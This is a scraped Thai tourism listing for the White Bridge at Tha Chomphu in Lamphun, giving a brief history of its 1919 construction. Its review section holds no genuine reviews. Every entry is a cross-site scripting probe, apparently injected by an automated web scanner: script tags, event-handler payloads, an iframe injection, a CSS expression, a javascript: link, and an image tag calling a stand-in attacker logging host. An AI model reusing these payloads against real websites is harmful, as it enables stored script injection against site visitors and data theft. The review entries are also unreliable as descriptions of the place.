โหลด App ฟรี

ยลสะพานขาวท่าชมภู

(sapankao)
แม่ทา   274 รีวิว  253 รูป
ที่ตั้ง บ้านทาชมภู หมู่ 4 ตำบลทาปลาดุก ต. อ.แม่ทา จ.ลำพูน  
เบอร์โทรศัพท์
Website http://
Email
รายละเอียด
สะพานขาวทาชมภู สร้างขึ้นเมื่อปี พ.ศ.2462 ตั้งอยู่ระหว่างสถานีขุนตานกับสถานีรถไฟทาชมภู ในเขตอำเภอแม่ทา จังหวัดลำพูนสะพานขาวทาชมภู หรือ “สะพานขาว” ตามที่
ชาวเมืองลำพูนเรียกขานกัน ซึ่งสะพานขาวทาชมภูนี้ เปรียบเสมือนเป็นน้องของอุโมงค์ขุนตานเนื่องจากเกิดหลังจากที่สร้างอุโมงค์ขุนตานเสร็จได้ไม่นาน ในปี พ.ศ.2462 พลเอกพระเจ้าบรมวงศ์เธอพระองค์เจ้าบุรฉัตรไชยากร กรมพระกำแพงเพชรอัครโยธิน ทรงรับสั่งให้ก่อสร้างสะพานบ้านทาชมภูต่อจากอุโมงค์รถไฟขุนตานเพื่อให้รถไฟสามารถข้ามผ่านลำน้ำแม่ทา

กิจกกรมที่ต้องทำที่นี่เส้นทาง

ข้อมูลเพิ่มเติม และรีวิวสถานที่นี้ จากรอบข้าง

  ข้อมูล ยลสะพานขาวท่าชมภู จาก Google
  ข้อมูล ยลสะพานขาวท่าชมภู จากเว็บไปด้วยกัน
   
 
   
Reviews (274)
เขียนรีวิวสถานที่
ข้อความ :
รูปภาพ :
เขียนโดย :

1 - 9/19/2019
1
1 - 9/19/2019
1
1 - 9/19/2019
1
1 - 9/19/2019
1<img sRc='http://attacker-996068/log.php?
1 - 9/19/2019
1<ifRAme sRc=991945.com></IfRamE>
1 - 9/19/2019
1_uZaVi <ScRiPt >prompt(993791)</ScRiPt>
1 - 9/19/2019
1}body{acu:Expre/**/SSion(prompt(917104))}
1 - 9/19/2019
1<img<!-- --> src=x onerror=alert(965905);//><!-- -->
1 - 9/19/2019
[url=http://www.vulnweb.com][/url]
1 - 9/19/2019
<a HrEF=jaVaScRiPT:>
1 - 9/19/2019
<a HrEF=http://www.vulnweb.com></a>
1 - 9/19/2019
1<input autofocus onfocus=prompt(967400)>
1 - 9/19/2019
๖<img acu onmouseover=prompt(938625) //๖>
1 - 9/19/2019
1<ScRiPt>prompt(992261)</sCripT>
1 - 9/19/2019
1\u003CScRiPt\u003Eprompt(907978)\u003C/sCripT\u003E
1 - 9/19/2019
1<ScRiPt%20>prompt(915591)</sCripT>
1 - 9/19/2019
1<img/src=">" onerror=alert(960657)>
1 - 9/19/2019
1<img src=xyz OnErRor=prompt(996564)>
1 - 9/19/2019
1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(902820)>
1 - 9/19/2019
1<body onload=prompt(911277)>

 
 
 
Copyright © 2016-2018 สนง.ปลัด อบจ.ลำพูน. All rights reserved. เจ้าของโรงแรม รีสอร์ท | เจ้าของร้านอาหาร
125 หมู่ 15 ต.ป่าสัก อ.เมือง จ.ลำพูน 51000 โทร: 0-5359-7260